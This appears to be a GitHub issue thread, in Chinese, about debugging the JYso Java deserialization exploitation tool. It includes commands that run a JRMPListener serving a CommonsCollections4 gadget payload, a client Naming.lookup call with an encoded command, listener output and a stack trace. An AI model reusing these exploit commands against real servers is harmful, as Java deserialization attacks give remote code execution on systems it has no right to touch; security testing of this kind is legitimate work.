Closed wgf4242 closed 1 month ago
RMI中没有Deserialization路由。。。
java -cp JYso.jar -y com.qi4l.jndi.exploit.JRMPListener 8888 -g CommonsCollections4 -p calc.exe
openjdk version "17.0.11" 2024-04-16
java -cp JYso.jar -y com.qi4l.jndi.exploit.JRMPListener 8888 -g CommonsCollections4 -p calc.exe
java -cp JYso-1.3.1.jar -y com.qi4l.jndi.exploit.JRMPListener 1099 -g CommonsCollections4 -p calc.exe
* Opening JRMP listener on 1099
Have connection from /192.168.50.161:61486
Reading message...
Sending return with payload for obj [0:0:0, 0]
com.nqzero.permit.Permit$InitializationFailed: initialization failed, perhaps you're running with a security manager
at com.nqzero.permit.Permit.setAccessible(Permit.java:22)
at com.qi4l.jndi.gadgets.utils.Reflections.setAccessible(Reflections.java:13)
at com.qi4l.jndi.gadgets.utils.Reflections.getField(Reflections.java:20)
at com.qi4l.jndi.gadgets.utils.Reflections.setFieldValue(Reflections.java:29)
at com.qi4l.jndi.exploit.JRMPListener.doCall(JRMPListener.java:275)
at com.qi4l.jndi.exploit.JRMPListener.doMessage(JRMPListener.java:217)
at com.qi4l.jndi.exploit.JRMPListener.run(JRMPListener.java:171)
at com.qi4l.jndi.exploit.JRMPListener.main(JRMPListener.java:80)
Caused by: com.nqzero.permit.Permit$FieldNotFound: field "override" not found
at com.nqzero.permit.Permit.<init>(Permit.java:222)
at com.nqzero.permit.Permit.build(Permit.java:117)
at com.nqzero.permit.Permit.<clinit>(Permit.java:16)
不行啊。报这个错误。
用JDK1.8吧,或者你换成JDK17重新编译一下
用JDK1.8吧,或者你换成JDK17重新编译一下
F:\>java -version java version "1.8.0_51"
Java(TM) SE Runtime Environment (build 1.8.0_51-b16)
Java HotSpot(TM) 64-Bit Server VM (build 25.51-b03, mixed mode)
F:\downloads>java -cp JYso-1.3.0.jar com.qi4l.jndi.exploit.JRMPListener 1099 -g CommonsCollections4 -p calc.exe
* Opening JRMP listener on 1099
Have connection from /192.168.50.161:62615
Reading message...
Sending return with payload for obj [0:0:0, 0]
Closing connection
也是没成功。
这个明显不是我的问题了啊
这个明显不是我的问题了啊
复制你的命令忘改了。。改了一下。。还是没成功。
确实是有问题,改了 感谢反馈
启动
java -jar JYso-1.3.1.jar -j -i 127.0.0.1
是这样执行 calc么? Naming.lookup("rmi://127.0.0.1:1099/Deserialization/CommonsCollections4/command/Base64/Y2FsYw==");
结果并不行。用ysoserial测过是没问题的。 java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 calc.exe Naming.lookup("rmi://192.168.50.161:1099/test");